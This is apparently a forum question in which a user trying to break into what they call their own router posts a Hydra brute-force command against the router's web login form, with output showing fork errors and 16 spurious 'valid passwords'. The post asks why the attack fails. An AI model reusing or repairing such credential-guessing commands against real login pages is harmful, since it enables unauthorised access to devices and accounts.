# building Hydra login router web page input

Tags: hydra

I am still trying to hack into my router. I am attaching my Hydra and page elements.

I realized that sometimes when I type a password the password name numbers change, for example password_1338101351 changes to password_594593038 or to another random number.

Does someone knows what's wrong in my Hydra input?

Hydra-output

```
c:\hydra>hydra -l admin -P password.txt 192.168.1.1 http-post-form "/index.cgi:u
sername=^USER^&password_1338101351=^PASS^:Login failed, please try again"
Hydra v8.0 (c) 2014 by van Hauser/THC & David Maciejak - Please do not use in mi
litary or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-08-01 23:29:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 306706 login tries (l:1/p:30
6706), ~1198 tries per task
[DATA] attacking service http-post-form on port 80
      2 [main] hydra 7768 child_info_fork::abort: c:\hydra\libz.dll: Loaded to d
ifferent address: parent(0x340000) != child(0x350000)
[ERROR] Fork for children failed: Resource temporarily unavailable
      2 [main] hydra 7808 child_info_fork::abort: c:\hydra\libz.dll: Loaded to d
ifferent address: parent(0x340000) != child(0x350000)
[ERROR] Fork for children failed: Resource temporarily unavailable
      2 [main] hydra 7828 child_info_fork::abort: c:\hydra\libz.dll: Loaded to d
ifferent address: parent(0x340000) != child(0x2C0000)
[ERROR] Fork for children failed: Resource temporarily unavailable
      2 [main] hydra 7860 child_info_fork::abort: c:\hydra\libz.dll: Loaded to d
ifferent address: parent(0x340000) != child(0x2C0000)
[ERROR] Fork for children failed: Resource temporarily unavailable
      2 [main] hydra 7984 child_info_fork::abort: c:\hydra\libz.dll: Loaded to d
ifferent address: parent(0x340000) != child(0x2C0000)
[ERROR] Fork for children failed: Resource temporarily unavailable
      2 [main] hydra 8080 child_info_fork::abort: c:\hydra\libz.dll: Loaded to d
ifferent address: parent(0x340000) != child(0x350000)
[ERROR] Fork for children failed: Resource temporarily unavailable
      3 [main] hydra 8104 child_info_fork::abort: c:\hydra\libz.dll: Loaded to d
ifferent address: parent(0x340000) != child(0x2C0000)
[ERROR] Fork for children failed: Resource temporarily unavailable
      2 [main] hydra 8116 child_info_fork::abort: c:\hydra\libz.dll: Loaded to d
ifferent address: parent(0x340000) != child(0x2C0000)
[ERROR] Fork for children failed: Resource temporarily unavailable
      2 [main] hydra 8148 child_info_fork::abort: c:\hydra\libz.dll: Loaded to d
ifferent address: parent(0x340000) != child(0x350000)
[ERROR] Fork for children failed: Resource temporarily unavailable
      2 [main] hydra 8188 child_info_fork::abort: c:\hydra\libz.dll: Loaded to d
ifferent address: parent(0x340000) != child(0x2C0000)
[ERROR] Fork for children failed: Resource temporarily unavailable
      2 [main] hydra 7264 child_info_fork::abort: c:\hydra\libz.dll: Loaded to d
ifferent address: parent(0x340000) != child(0x2C0000)
[ERROR] Fork for children failed: Resource temporarily unavailable
[80][www-form] host: 192.168.1.1   login: admin   password: !@#$%^
[80][www-form] host: 192.168.1.1   login: admin   password: !@#$%
[80][www-form] host: 192.168.1.1   login: admin   password: !@#$%^&
[80][www-form] host: 192.168.1.1   login: admin   password: 0
[80][www-form] host: 192.168.1.1   login: admin   password: 0racl38
[80][www-form] host: 192.168.1.1   login: admin   password: *
[80][www-form] host: 192.168.1.1   login: admin   password: 0racl3
[80][www-form] host: 192.168.1.1   login: admin   password: 0racl38i
[80][www-form] host: 192.168.1.1   login: admin   password: 0racl39
[80][www-form] host: 192.168.1.1   login: admin   password: 0racle8i[80][www-for
m] host: 192.168.1.1   login: admin   password: 0racle8

[80][www-form] host: 192.168.1.1   login: admin   password: !@#$%^&*
[80][www-form] host: 192.168.1.1   login: admin   password: 0racl39i
[80][www-form] host: 192.168.1.1   login: admin   password: 0racle
[80][www-form] host: 192.168.1.1   login: admin   password: 0racle10
[80][www-form] host: 192.168.1.1   login: admin   password: 0racle10i
1 of 1 target successfully completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-08-01 23:29:18
```